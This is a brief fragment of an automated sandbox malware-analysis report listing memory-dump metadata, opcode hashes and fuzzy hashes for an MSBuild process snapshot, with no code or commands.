                            • Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d84e75eca6516ae75d44b4fe68a4e630f035181522d6a3a6cbf48a7425e96c2d
                            • Instruction ID: 45212c09eedcd6b846a623b37c35751e9a3c593208348d6b703700aecbcb4542
                            • Opcode Fuzzy Hash: d84e75eca6516ae75d44b4fe68a4e630f035181522d6a3a6cbf48a7425e96c2d
                            • Instruction Fuzzy Hash: A131C334A05228CFDB24DF60D948BADBBB2BB85301F2085D9D54A772A1DB314E85CF61